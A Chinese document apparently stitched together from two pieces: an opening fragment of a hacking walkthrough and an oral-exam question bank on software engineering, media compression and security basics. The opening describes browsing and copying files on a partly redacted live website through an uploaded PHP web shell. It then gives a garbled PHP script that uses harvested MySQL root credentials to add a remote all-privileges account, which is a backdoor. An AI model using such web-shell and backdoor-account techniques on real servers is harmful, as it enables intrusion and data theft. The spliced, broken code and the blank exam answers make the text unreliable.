注: 由于时间仓促代码界面没优化好,在dir文本框中输入要浏览的目录名称;copy文本框中,上面输入源文件如d:\\web\\cmd.php,下面输入目标 文件如d:\\web\\cmdbak.php;del文本框中输入要删除的文件名如:d:\\web\\cmdbak.php;ren命令与copy命令相似; 点浏览按钮,选择你要上传的文件,然后点upload按钮,就上传到与本SHELL相同的目录下了. 运行: http://www.*****.net/ a***lover/photo/gallery/cmd.php,利用dir命令,可以看D盘,C:\\windows,以及C:\\Program Files下的内容,而且对D盘还有写权限!在通过copy命令把想下载的软件考到WEB目录下下载下来了^_^

如何才能把文件写到只读的C盘上呢?这就要通过MYSQL了!但是MYSQL没有远程连接啊!没有条件创造条件,看文章系统的配臵文件config.inc.php的内容了吗? $dbhost=\数据库主机名 $dbuser=\数据库用户名 $dbpass=\数据库密码 $dbname=\数据库名 数据库用户名和密码都知道了,可惜的是本地用户,然而我们能不能通过本地有最高权限用户root来添加个远程用户呢?答案是肯定的。

为此专门写了个程序adduser.php利用已知的有ROOT权限的帐号添写加远程ROOT权限的帐号,内容如下: 以下是代码片段:

$dbh=mysql_connect('localhost:3306','root','*****');// echo mysql_errno().\

加油!-----老菜鸟队

mysql_select_db('mysql');

echo mysql_errno().\\

$query=%username@'%'IDENTIFIED BY 'password' WITH GRANT OPTION\

$res=mysql_query($query, $dbh);

echo mysql_errno().\\

$err=mysql_error(); if($err){

echo \!\} else{

echo \!\}

《网络攻防技术实践》考核口试题

?

软件工程相关

1. 软件的算法是如何定义的?有哪些主要特征?

算法是指解题方案的准确而完整的描述,是一系列解决问题的清晰指令。 七个主要特征:有穷性、确定性、可行性、有效性、健壮性、输入项输出项 2. 软件中算法的效率如何度量?

空间复杂度、时间复杂度。 3. 解释一下算法、程序和软件的概念。

算法:通常指可以用来解决的某一类问题的步骤或程序,这些步骤或程序必须是明确的和有效的,而且能够在有限步之内完成的。

程序:程序(program)是为实现特定目标或解决特定问题而用计算机语言编写的命令序列的集合。

软件:计算机系统中与硬件相互依存的一部分,包括程序、数据、相关文档的完整集合。 4. 什么是结构化程序设计?有哪几种主要结构?

结构化程序设计(structured programming)是进行以模块功能和处理过程设计为主的详细设计的基本原则。它的主要观点是采用自顶向下、逐步求精的程序设计方法,使用三种基本控制结构构造程序。任何程序都可由顺序、选择、循环三种基本控制结构构造 。 5. 解释一下C语言中结构体的概念?

结构体是由一系列具有相同类型或不同类型的数据构成的数据集合。 6. 什么是数据结构?数据结构在计算机中如何表示?

数据结构是计算机存储、组织数据的方式。数据结构是指相互之间存在一种或多

加油!-----老菜鸟队

种特定关系的数据元素的集合。常用的数据结构有数组、栈、队列、链表、树、图、堆和散列表等。数据结构在计算机中的表示成为数据的物理结构,又称为存储结构,包括数据元素的表示和关系的表示。表示方法有结点、顺序存储结构和链式存储结构。 7. 解释一下数据结构中线性表的概念?

线性表中数据元素之间的关系是一对一的关系,即除了第一个和最后一个数据元素之外,其它数据元素都是首尾相接的。 8. 解释一下数据结构中树的概念?

树是由一个集合以及在该集合上定义的一种关系构成的。集合中的元素称为树的结点,所定义的关系称为父子关系。父子关系在树的结点之间建立了一个层次结构,这个结点称为该树的根结点。

树的递归定义:

树(Tree)是n(n≥0)个结点的有限集T,T为空时称为空树,否则它满足如下两个条件: (1)有且仅有一个特定的称为根(Root)的结点;一个根节点

(2)其余的结点可分为m(m≥0)个互不相交的子集Tl,T2,…,Tm,其中每个子集本身又是一棵树,并称其为根的子树(Subree)。 9. 解释一下数据结构中队列的概念?

队列是一种特殊的线性表,它只允许在表的前端(front)进行删除操作,而在表的后端(rear)进行插入操作。 10. 为什么要实施软件工程?

?软件的快速发展:需求越来越高、规模越来越大、种类越来越多、结构越来越复杂; 软件危机的存在:软件的特点及传统开发方法使软件危机四伏 11. 软件工程的基本内容是什么?

软件工程研究如何以系统性的、规范化的、可定量的过程化方法去开发和维护软件,如何把正确的管理技术和当前最好的技术方法结合起来。

主要内容:软件开发技术、软件工程管理。 12. 有哪几种主要的软件开发模型?

瀑布模型、快速原型模型、增量模型、螺旋模型、喷泉模型。 13. 软件有哪些主要特点?

(1)软件具有抽象性;(2)软件不是制造出来的;(3)软件没有磨损和老化,有生命周期;(4)对计算机系统有依赖性; 14. 软件是如何分类的?

一般来讲软件被划分为系统软件、应用软件,管理软件、行业软件、安全防护软件、多媒体软件、游戏软件

(1)按软件功能划分:系统软件、支撑软件、应用软件

加油!-----老菜鸟队

(2)按软件规模进行划分:微型、小型、中型、大型、甚大型、极大型、 (3) 按工作方式划分:实时处理软件、分时软件、交互式软件、批处理软件 (4) 按软件服务对象的范围划分:项目软件、产品软件 (5) 按使用的频度进行划分:一次使用、频繁使用

(6) 按软件失效的影响进行划分:高可靠性软件、一般可靠性软件 15. 什么是软件危机?其主要表现有哪些?

落后的软件生产方式无法满足迅速增长的计算机软件需求,从而导致软件开发与维护过程中出现一系列严重问题的现象。

表现:1软件开发成本进度失控;2用户不满意;3软件产品的质量靠不住;4缺乏文档资料;5软件不可维护; 6软件成本占计算机系统总成本的比例上升;7软件开发生产率的提高跟不上计算机普及深入的趋势。 16. 什么是软件工程?

软件工程是研究如何以系统性的、规范化的、可定量的过程化方法去开发和维护软件,如何把正确的管理技术和当前最好的技术方法结合起来。 17. 什么是软件工程的三要素?

方法、工具和过程

18. 软件工程的知识结构包括哪些主要内容?

软件需求、软件设计、软件构造、软件测试、软件维护、软件配臵管理、软件工程管理、软件工程过程、软件工程工具和方法、软件质量 19. 什么是软件工程中的配臵管理?

配臵管理(Configuration Management,CM)是通过技术或行政手段对软件产品及其开发过程和生命周期进行控制、规范的一系列措施。配臵管理的目标是记录软件产品的演化过程,确保软件开发者在软件生命周期中各个阶段都能得到精确的产品配臵。 20. 软件工程中文档的作用是什么?

1)阶段工作成果和结束标志;2)向管理人员提供软件开发过程中的进展和情况;3)记录开发过程中的技术信息,便于协调以后的软件开发、使用和修改;4)便于各类人员之间相互了解彼此的工作;5)向潜在用户报告软件的功能和性能。 21. 软件工程的基本原则有哪些?

1选取适宜开发范型;2采用合适的设计方法;3提供高质量的工程支持;4重视开发过程的管理.

22. 如何选择软件过程模型?

1)模型应符合软件本身的性质(规模、复杂性) 2)模型应满足软件应用系统整体开发进度要求 3)模型应有可能控制并消除软件开发风险

加油!-----老菜鸟队

4)模型应有可用的计算机辅助工具(如快速原型工具)的支持 5)模型应与用户和软件开发人员的知识和技能相匹配 6)模型应有利于软件开发的管理与控制 23. 什么是软件设计?

应用各种技术和原理,详细定义一个设备、程序或系统的物理实现的过程。 24. 软件设计的目标和目的是什么?

1付出较低的开发成本、2达到要求的软件功能、3取得较好的软件性能、4开发的软件易于移植、5需要较低的维护费用、6能按时完成开发工作,7及时交付使用 25. 软件设计的任务是什么?

数据设计:将分析时创建的信息域模型变换为实现软件所需的数据结构 结构设计:定义软件系统各主要部件之间的关系

接口设计:描述软件内部、软件和协作系统之间以及软件与人之间如何通信 过程设计:把系统结构部件转换成软件单元的过程性描述 26. 软件设计的过程包括哪些主要内容?

软件的设计是一个将需求转变为软件陈述(表达)的过程。通过逐步求精使得设计陈述逐渐接近源代码。这里有两个基本步骤;第一步是初步设计,将需求转换成数据和软件框架。第二步是详细设计,将框架逐步求精细化为具体的数据结构和软件的算法表达。 27. 良好的软件设计的特征有哪些?

设计必须实现所有包含在分析模型中的明示需求,并且必须满足客户希望的所有潜在需求;设计对于软件的编码、测试、维护人员必须是可读的、可理解的;设计应该提供软件的完整面貌,包括从实现角度所见的数据、功能、流程。 28. 软件设计的原则有哪些?

1设计对于分析模型应该是可跟踪的;2设计结构应该尽可能的模拟实际问题;3设计应该表现出一致性;4不要把设计当成编写代码;5在创建设计时就应该能够评估质量;6评审设计以减少语义性的错误;7设计应该模块化。 29. 什么是软件设计中的内聚?主要有哪些类型?

内聚指的是一个模块内部各组成部分的处理动作的组合强度,又称块内联系。 偶然内聚、逻辑内聚、时间内聚、过程内聚、通讯内聚、顺序内聚、功能内聚。 30. 什么是软件设计中的耦合?主要哪些等级?

耦合(coupling)指的是两个模块之间的相互依赖关系,又称块间联系。 非直接耦合、数据耦合、特征耦合、控制耦合、外部耦合、公共耦合、内容耦合。 31. 什么是软件设计中的数据设计?有主要原则有哪些?

将模型转换成数据结构的定义。选择需求定义、规格说明中提出的数据对象的逻辑表示。

加油!-----老菜鸟队

原则:(1)用于功能和行为的系统分析原则也应用于数据

(2)应该标识所有的数据结构以及其上的操作 (3)应当建立数据字典,并用于数据设计和程序设计 (4)低层的设计决策应该推迟到设计过程的后期

(5)只有那些需要直接使用数据结构内部数据的模块才能看到该数据的表示 (6)应该开发一个由有用的数据结构和应用于其上的操作组成的库 (7)软件设计和程序设计语言应该支持抽象数据类型的规格说明和实现。 32. 什么是软件设计中的结构设计?

开发一个模块化的程序结构,表示出模块之间的控制关系,将程序设计和数据结构相结合,为数据在程序中的流动定义接口。 33. 什么是软件设计中的可靠性设计和安全设计?

可靠性设计:应根据系统的可靠性要求,按照可靠性设计准则开展设计工作,并在必要时,进行容错、避错等专门的可靠性设计工作。要特别注意对软件出错处理的设计工作,不仅要设计对硬件等软件外系统出错时的处理,而且还要在假定最终软件产品必定还会有错的情况下,进行软件出错的处理设计。

安全设计:在体系结构设计中应充分考虑系统对软件的安全性需求,进行安全性分析,确定安全性关键的软件部件,采取相应的安全性设计措施。 34. 如何选择编程语言?

应用领域、算法及运算的复杂性、软件运行的环境、性能、数据结构的复杂性、软件开发组成员对该语言的熟悉程度 35. 什么是源程序文档化?

选择好标识符的名字,安排必要的注解,使得程序的结构一目了然,便于他人阅读,这样的过程叫做源程序文档化。

36. 什么是程序中的注释?包括哪几种主要类型?

注释就是对代码的解释和说明。目的是为了让别人和自己很容易看懂。夹在程序中的注释是程序员与日后的程序读者之间通信的重要手段。

序言性注释和功能性注释 37. 如何理解程序的效率?

程序的效率是指程序的执行速度及程序所需占用的内存的存储空间。 38. 程序的复杂性如何度量?

一个程序的复杂性的高低体现在运行该程序所需要的计算机资源的多少上面,所需的资源越多,我们就说该程序的复杂性越高;反之,则该算法的复杂性越低。

度量方法有代码行度量法、McCabe度量法、Halstead度量法。 39. 什么是软件中的调试?有哪些调试策略?

加油!-----老菜鸟队

编好程序后,用各种手段进行查错和排错的过程。作为程序的正确性不仅仅表现在正常功能的完成上,更重要的是对意外情况的正确处理。调试策略:

调试策略:试探法、回溯法、对分查找法、归纳法、演绎法 40. 软件调试过程中修改错误的原则有哪些?

1、在出现错误的地方很可能还有别的错误

2、修改错误的一个常见失误是只修改了这个错误的征兆或这个错误的表现,而没有修改错误的本身

3、当心修正一个错误的同时有可能会引入新的错误 4、修改错误的过程将迫使人们暂时回到程序设计阶段 5、修改源代码程序,不要改变目标代码 41. 软件测试的目的是什么?

从用户的角度出发,普遍希望通过软件测试暴露软件中隐藏的错误和缺陷,以考虑是否可接受该产品。从软件开发者的角度出发,则希望测试成为表明软件产品中不存在错误的过程,验证该软件已正确地实现了用户的要求,确立人们对软件质量的信心 42. 软件测试的原则是什么?

1. 应当把“尽早地和不断地进行软件测试”作为软件开发者的座右铭。 2. 测试用例应由测试输入数据和对应的预期输出结果这两部分组成。 3. 程序员应避免检查自己的程序。

4. 在设计测试用例时,应当包括合理的输入条件和不合理的输入条件。

5. 充分注意测试中的群集现象。经验表明,测试后程序中残存的错误数目与该程序中已发现的错误数目成正比。

6. 按计划测试,排除测试的随意性。 7. 应当对每一个测试结果做全面检查。

8. 妥善保存测试计划,测试用例,出错统计和最终分析报告,为维护提供方便。 43. 软件测试的对象是什么?测试完成的准则是什么?

需求分析、概要设计、详细设计以及程序编码等各阶段所得到的文档,包括需求规格说明、概要设计规格说明、详细设计规格说明以及源程序,都应成为软件测试的对象。 完成准则:1资源耗尽

2采用的测试方法满足某种测试充分性要求 3满足覆盖率等可度量的测试要求

4一段时期没有发现问题且所有发现问题均已解决 5通过测试评估出软件达到要求的可靠度

6测试发现频率和趋势达到预先计划的限度之下(限度根据要求、经验和历史数据得到)

加油!-----老菜鸟队

7在一段时期没有出现等级高的问题

44. 主要有哪些类型的测试活动?

单元测试、集成测试、合格性测试、系统测试、功能测试、强度测试、安全性测试、可靠性测试、恢复性测试、第三方测试 45. 什么是软件测试中的单元测试?

单元测试是验证单元满足功能、性能和接口等的要求 46. 什么是软件测试中的集成测试?

依据软件设计确定的软件结构,按照软件集成“工序”,把各个软件单元逐步集成为完整的软件系统,并不断发现和排除错误,以保证联接、集成的正确性 47. 什么是软件测试中的合格性测试?

根据软件需求规格说明中定义的全部功能、性能、可靠性等需求,测试整个软件是否达到要求。

48. 什么是软件测试中的系统测试?

软件与与系统中其它的软、硬件对接并测试其接口的过程 49. 什么是软件测试中的功能测试?

功能测试是在规定的一段时间内运行软件系统的所有功能,以验证这个软件系统有无严重错误

50. 什么是软件测试中的强度测试?

强度测试是要检查在系统运行环境不正常乃至发生故障的情况下,系统可以运行到何种程度的测试

51. 什么是软件测试中的可靠性测试?

软件可靠性测试是以能获得可用来评估软件可靠性的数据为目的的一种软件测试。 52. 什么是软件测试中的安全测试?

针对程序中危险防止和危险处理设施进行的测试,以验证其是否有效。 53. 什么是软件测试中的恢复性测试?

恢复测试是要证实在克服硬件故障(包括掉电、硬件或网络出错等)后,系统能否正常地继续进行工作,并不对系统造成任何损害。 54. 什么是软件测试中的Alpha测试和Beta测试?

Alpha测试:由一个用户在开发者的场所、在开发者指导下进行测试 Beta测试:由最终用户在一个或多个用户场所单独地进行测试 55. 什么是软件测试中的独立(第三方)测试?

第三方指的是与软件项目甲方、乙方相对独立的其它机构。

进行独立测试的目的是进一步加强软件质量保证工作,提高软件的质量,并对软件产品进行客观评价。进行第三方独立测试通常有以下优点:

加油!-----老菜鸟队

1)发挥专业技术优势;2)发挥独立性优势;3)进一步促进承办方的工作。 56. 软件测试的方法主要有哪些?

静态测试 动态测试

57. 什么是软件测试方法中的静态测试?

静态分析、代码审查、代码走查、桌面检查、技术评审 58. 什么是软件测试方法中的动态测试?

白盒测试、黑盒测试

59. 什么是软件测试方法中的黑盒测试?

是把测试对象看做一个黑盒子,测试人员完全不考虑程序内部的逻辑结构和内部特性,只依据程序的需求规格说明书,检查程序的功能是否符合它的功能说明。 60. 什么是软件测试方法中的白盒测试?

把测试对象看做一个透明的盒子,它允许测试人员利用程序内部的逻辑结构及有关信息,设计或选择测试用例,对程序所有逻辑路径进行测试。通过在不同点检查程序的状态,确定实际的状态是否与预期的状态一致。 61. 什么是软件黑盒测试的等价类?

等价类划分是一种典型的黑盒测试方法,使用这一方法时,完全不考虑程序的内部结构,只依据程序的规格说明来设计测试用例。

使用这一方法设计测试用例要经历划分等价类和选取测试用例两步。

1、划分等价类,等价类是指某个输入域的子集合,在该集合中,各个输入数据对于揭露程序中的错误都是等价的。

2、在每一个等价类中取一个数据作为测试的输入条件,这样就可以少量的代表性测试数据,来取得较好的测试结果

62. 什么是软件黑盒测试有效等价类和无效等价类?

①有效等价类:是指对于程序的规格说明来说,是合理的,有意义的输入数据构成的集合。 ②无效等价类:是指对于程序的规格说明来说,是不合理的,无意义的输入数据构成的集合。 63. 软件维护的概念是什么?

在软件运行/维护阶段对软件产品进行的修改就是所谓的维护。 64. 软件维护的类型有哪几种?其基本概念是什么?

维护的类型有三种: 改正性维护、适应性维护、完善性维护

改正性维护:为了识别和纠正软件错误、改正软件性能上的缺陷、排除实施中的误使用,应当进行的诊断和改正错误的过程就叫做改正性维护。

适应性维护:为使软件适应使用过程中外部环境和数据环境的变化,而去修改软件的过程就叫做适应性维护。

完善性维护:在软件的使用过程中,。为了满足用户对软件提出新的功能要求,需要修

加油!-----老菜鸟队

改或再开发软件叫做完善性维护。 65. 软件用户界面应具备哪些特性?

可使用性、灵活性、复杂性、可靠性、 66. 软件用户类型如何划分?

外行型、初学型、熟练型、专家型 67. 解释说明UML的概念和作用?

统一建模语言(UML)是用来对软件密集系统进行描述、构造、视化和文档编制的一种语言。

统一了面向对象建模的基本概念、属于及图形符号,为人们建立了便于交流的共同语言。 68. 举例说明UML中的时序图、类图的概念和价值?

时序图(Sequence Diagram)用来显示对象之间的关系,并强调对象之间消息的时间顺序,同时显示了对象之间的交互。它通过描述对象之间发送消息的时间顺序显示多个对象之间的动态协作。它可以表示用例的行为顺序,当执行一个用例行为时,时序图中的每条消息对应了一个类操作或状态机中引起转换的触发事件。

时序图中包括如下元素:类角色,生命线,激活期、消息

类图表示不同的实体(人、事物和数据)如何彼此相关;换句话说,它显示了系统的静态结构。该图描述了系统的类别集合,类别的属性和类别之间的关系。 69. 总结和分析如何进行高质量的C++编程?

自己编吧

70. 软件质量如何度量?

1. 可理解性;2. 可靠性;3. 可测试性;4. 可修改性;5. 可移植性;6. 效率;7. 可使用性

?

媒体处理相关

71. 数据压缩的基本分类?

无损压缩,有损压缩

72. 衡量数据压缩质量的主要指标是什么?

(1)压缩比;(2)压缩质量(失真);(3)压缩与解压缩的速度。 73. 图像的主要压缩编码格式有哪些?

jpeg、jpeg2000、bmp、gif、psd、png、jpg、jpe 74. JPEG图像压缩的基本原理?

JPEG压缩过程:1.颜色模式转换及采样;2.DCT变换;3.量化;4.编码(Huffman编码)。 75. JPEG2000图像压缩的基本原理?

JPEG 2000与传统JPEG最大的不同,在于它放弃了JPEG 所采用DTC(离散馀弦转换)为主的区块编码方式,而改采以小波转换为主的多解析编码方式。小波转换的主要目的是要将

加油!-----老菜鸟队

图像的频率成分抽取出来。

JPEG2000的优点:1、其压缩率比JPEG 高约30%左右2、JPEG2000同时支持有损和无损压缩3、JPEG2000能实现渐进传输 4、JPEG2000支持所谓的“感兴趣区域”特性。 76. DCT变换基本原理和作用?

DCT变换的全称是离散余弦变换(Discrete Cosine Transform),是指将一组光强数据转换成频率数据,以便得知强度变化的情形。若对高频的数据做些修饰,再转回原来形式的数据时,显然与原始数据有些差异,但是人类的眼睛却是不容易辨认出来。 77. Huffman编码的基本原理和作用?

在变长编码中,对出现概率大的信源符号赋于短码字,而对于出现概率小的信源符号赋于长码字。如果码字长度严格按照所对应符号出现概率大小逆序排列,则编码结果平均码字长度一定小于任何其它排列方式。也称为最佳编码,平均码长最短。 78. 音频的主要压缩编码格式有哪些?

有损压缩:MP3、WMA、OGG、 无损压缩:APE、FLAC、 79. PCM的基本概念?

脉冲编码调制就是把一个时间连续,取值连续的模拟信号变换成时间离散,取值离散的数字信号后在信道中传输。脉冲编码调制就是对模拟信号先抽样,再对样值幅度量化,编码的过程。

80. 音频波形编码的基本概念?

PCM——DM——DPCM—— ADM —— ADPCM —— APC——ATC

波形编码具有适应能力强、话音质量好等优点,但是所需要的编码速率高。 81. 音频参数编码的基本概念? LPC —— CELP ——STC —— WI

参数编码的压缩率很大,但计算量大, 保真度不高,适合语音信号的编码。 82. 音频混合编码的基本概念?

MPLPC—— RPE-LPC—— VSELP —— ACELP ——CS-ACELP —— MBE —— QCELP

混合编码介于波形编码和参数编码之间,集中了两者优点。 83. 视频压缩编码格式主要有哪些?

wmv,mpeg,mov,avi,rm,rmvb 84. MPEG的含义是什么?

MPEG(Moving Picture Expert Group)运动图像专家组是在1988年由国际标准化组织(International Organization for Standardization,ISO)和国际电工委员会(International Electrotechnical Commission,IEC)联合成立的专家组。

开发电视图像数据和声音数据的编码、解码和它们的同步等标准。

加油!-----老菜鸟队

他们开发的标准称为MPEG标准。

85. MPEG视频压缩编码方法中的图像类别有哪几种?

I图象:利用图象自身的相关性压缩,提供压缩数据流中的随机存取的点; P图象:用最近的前一个I图象(或P图象)预测编码得到图像(前向预测);

B图象:在预测时,既可使用了前一个图象(I或P)作参照,也可使用下一个图象做参照或同时使用前后两个图象作为参照图象(双向预测) 86. 解释视频压缩编码过程中的运动补偿概念?

运动补偿技术主要用于消除P图象和B图象在时间上的冗余性提高压缩效率。 87. 基于MPEG-1标准的视频压缩编码基本原理?

采用基于DCT的变换编码技术,用以减少空域冗余信息(帧内压缩)。采用运动补偿技术减少帧序列在时间上的荣誉(帧间压缩)。 88. 基于MPEG-2标准的视频压缩编码基本原理?

但基本算法和MPEG-1相同。区别:隔行扫描;DTC变换可在帧内(细节多、运动部分少),也可在场内(细节少、运动分量多);可调型和非可调型编码,用户可选择。 89. 什么是MPEG-4?什么是MPEG-21?

MPEG-4 标准名称为“甚低速率视听编码”(very-low bitrate audio-visual coding)目标是低速率下(<64kbps)的视频、音频编码, 更加注重多媒体系统的交互性和灵活性。MPEG-4引入了视听对象(Audio-Visual Objects,AVO),使得更多的交互操作成为可能。

MPEG-21: the Next Generation of Standard for Multimedia Technology(下一代多媒体技术标准) 。它的目标是建立一个交互的多媒体框架。MPEG-21的技术报告向人们描绘了一幅未来的多媒体环境场景,这个环境能够支持各种不同的应用领域,不同用户可以使用和传送所有类型的数字内容。MPEG-21致力于为多媒体传输和使用定义一个标准化的、可互操作的和高度自动化的开放框架,这个框架考虑了DRM的要求、多媒体接入、用不同的网络和终端进行传输等问题,这种框架会为用户提供更丰富的信息。 90. 请解释一下MP3的概念和特征?

MP3就是一种音频压缩技术,由于这种压缩方式的全称叫MPEG Audio Layer3,所以人们把它简称为MP3。MP3是利用 MPEG Audio Layer 3 的技术,在音质丢失很小的情况下把文件压缩到更小的程度。而且还非常好的保持了原来的音质。 特征:

1.MP3是一个数据压缩格式。

2.它丢弃掉脉冲编码调制(PCM)音频数据中对人类听觉不重要的数据(类似于JPEG是一个有损图像压缩),从而达到了小得多的文件大小。

3.MP3音频可以按照不同的位速进行压缩,提供了在数据大小和声音质量之间进行权

加油!-----老菜鸟队

衡的一个范围。MP3格式使用了混合的转换机制将时域信号转换成频域信号。 4.32波段多相积分滤波器(PQF)。

5.36或者12 tap 改良离散余弦滤波器(MDCT);每个子波段大小可以在0...1和2...31之间独立选择。

6.MP3不仅有广泛的用户端软件支持,也有很多的硬件支持比如便携式媒体播放器(指MP3播放器)DVD和CD播放器.

?

? 信息安全基础知识

91. 什么是信息安全?什么是信息攻击?什么是信息对抗?什么是对抗信息?

答:信息安全的含义是指信息的损伤性变化(即意味着运动状态“表征”的篡改、删除、以假代真等,形成上述结果的方法多种多样,也与多种因素有关),是一件复杂的事。

信息攻击:人因某种意图、有计划地采取各种行动,破坏一些信息和信息系统的运动秩序(以达到某种破坏目的)。

信息对抗:受到攻击方采取各种措施反击信息攻击,包括预防、应急措施,力图使攻击难以奏效,减小己方损失,以致惩处攻击方、反攻对方等行动事件。

对抗信息:在信息安全与对抗领域,人们实现“对抗目的”所采取对抗行动时必定相应伴随产生相应信息,称为对抗信息。

92. RSA的基本原理是什么?其保证数据安全的测度是什么?

答:自己找找吧。

93. 解释一下信息安全技术中“VPN”的概念?

答:虚拟专用网络(Virtual Private Network ,简称VPN)指的是在公用网络上建立专用网络的技术。其之所以称为虚拟网,主要是因为整个VPN网络的任意两个节点之间的连接并没有传统专网所需的端到端的物理链路,而是架构在公用网络服务商所提供的网络平台,如Internet、ATM(异步传输模式〉、Frame Relay (帧中继)等之上的逻辑网络,用户数据在逻辑链路中传输。它涵盖了跨共享网络或公共网络的封装、加密和身份验证链接的专用网络的扩展。VPN主要采用了彩隧道技术、加解密技术、密钥管理技术和使用者与设备身份认证技术。

94. 解释一下信息安全技术中“防火墙”的概念?

答:防火墙(英文:firewall)是一项协助确保信息安全的设备,会依照特定的规则,允许或是限制传输的数据通过。防火墙可以是一台专属的硬件也可以是架设在一般硬件上的一套软件。

95. 解释一下信息安全技术中“入侵检测”的概念?

答:入侵检测(Intrusion Detection),顾名思义,就是对入侵行为的发觉。他通过对计算机网络或计算机系统中若干关键点收集信息并对其进行分析,从中发现网络或系统中是否有违反安全策略的行为和被攻击的迹象。

加油!-----老菜鸟队

96. 解释一下信息安全技术中“特洛伊木马”的概念?

答:一种秘密潜伏的能够通过远程网络进行控制的恶意程序。控制者可以控制被秘密植入木马的计算机的一切动作和资源,是恶意攻击者进行窃取信息等的工具。 97. 解释一下信息安全技术中“网络蠕虫”的概念?

答:蠕虫病毒是一种常见的计算机病毒。它是利用网络进行复制和传播,传染途径是通过网络和电子邮件。最初的蠕虫病毒定义是因为在DOS环境下,病毒发作时会在屏幕上出现一条类似虫子的东西,胡乱吞吃屏幕上的字母并将其改形。 98. 谈一谈你对信息安全技术现状及发展的看法? 99. 谈一谈你对信息对抗技术专业的看法? 100.

在“信息系统与安全对抗理论”课程中学到了什么?

内部资料,严禁外传。

本文来源:https://www.bwwdw.com/article/kpfw.html

Top